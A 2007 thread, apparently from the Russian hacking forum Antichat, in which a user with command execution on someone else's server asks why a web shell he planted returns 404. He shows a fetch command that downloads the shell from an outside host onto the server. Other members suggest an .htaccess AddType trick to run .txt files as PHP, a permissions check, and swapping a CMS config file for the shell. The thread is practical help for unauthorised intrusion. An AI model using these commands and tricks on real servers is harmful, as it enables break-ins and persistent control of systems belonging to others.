Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Проблемы с заливкой шелла |
27.07.2007, 15:29
|
|
Banned
Регистрация: 04.01.2007
Сообщений: 193
Провел на форуме:
4213286
Репутация:
728
|
|
Проблемы с заливкой шелла
Тут такая проблема :
есть шелл site/qwerty.cgi?= , где я после = могу выполнять команды. Я хочу залить более удобный шелл . На сервер можна заливать файлы через fetch.
При выполнении
fetch -o /kyda/zalivaem/shell.php http://site.com/shell.txt
шелл заливается на сервер (в этом я убедился командой ls -al и cat /kyda/zalivaem/shell.php мне выдает исходники шелла), но когда я захожу на ссылку шелла,
то мне выдает ошибку 404 .
как мне залить шелл на сайт ???
P.S: извиняюсь если создал тему не у том розделе
Последний раз редактировалось RAUL07; 27.07.2007 в 15:35..
|
|
|
27.07.2007, 15:36
|
|
Участник форума
Регистрация: 04.02.2007
Сообщений: 120
Провел на форуме:
306837
Репутация:
36
|
|
в другие каталоги заливать пробовал?
|
|
|
|
27.07.2007, 15:38
|
|
Banned
Регистрация: 04.01.2007
Сообщений: 193
Провел на форуме:
4213286
Репутация:
728
|
|
для заливки в другие каталоги недостаточно прав
|
|
|
|
27.07.2007, 15:49
|
|
Участник форума
Регистрация: 04.02.2007
Сообщений: 120
Провел на форуме:
306837
Репутация:
36
|
|
В каталоге, куда заливаешь, есть другие файлы? С каким расширением?
При попытке их посмотреть тоже 404?
Если нет, попробуй так:
cp shell.php shell.txt
и создай .htaccess такого содержания:
AddType application/x-httpd-php .txt
|
|
|
|
27.07.2007, 15:50
|
|
Fail
Регистрация: 17.09.2005
Сообщений: 2,242
Провел на форуме:
9089375
Репутация:
4268
|
|
Напиши в ПМ. Попробуем разрулить.
__________________
...
|
|
|
|
27.07.2007, 15:56
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Посмотри на права, какие получаются у шелла после заливки с урлы... Нету прав на выполнение скорее всего... Возможно хитро настроен mod_rewrite...
|
|
|
|
27.07.2007, 15:59
|
|
Banned
Регистрация: 04.01.2007
Сообщений: 193
Провел на форуме:
4213286
Репутация:
728
|
|
В каталоге есть еще файлы с расширением .cgi и при их просмотре выдаетс тоже ошибка 404
|
|
|
|
27.07.2007, 16:24
|
|
Участник форума
Регистрация: 04.02.2007
Сообщений: 120
Провел на форуме:
306837
Репутация:
36
|
|
Код:
#!/path_to_perl/perl
print "Content-type: text/plain\n\n";
print "hello!";
сохраняй как hello.cgi
chmod 755 hello.cgi
На такое тоже ругается? |
|
|
|
27.07.2007, 16:44
|
|
Постоянный
Регистрация: 22.04.2006
Сообщений: 566
Провел на форуме:
1325772
Репутация:
517
|
|
там есть файлы типа .htaccess? в предыдущих дирах? посмотри внимательнее в них.
как насчет модификации уже существующих файлов?
Например, у меня прокатывал такой вариант:
самописная ЦМС инклудила файл конфига. я его скопировал с именем config_.php
затем config.php с правильными правами на исполнение переименовал в другое имя и переписал. переименовав config_.php в оригинальный. инклудился он нормально, но вот уже не исполнялся так же как новосозданные файлы 
Кста, кто знает, что там за система была заюзана? |
|
|
|
27.07.2007, 16:45
|
|
Fail
Регистрация: 17.09.2005
Сообщений: 2,242
Провел на форуме:
9089375
Репутация:
4268
|
|
Короче тему можно закрывать. Сайт, на который удалось влить шелл не виден из веба. На остальных сайтах сервака нет прав доступа для заливки шелла.
__________________
...
Последний раз редактировалось Alexsize; 29.07.2007 в 19:16..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
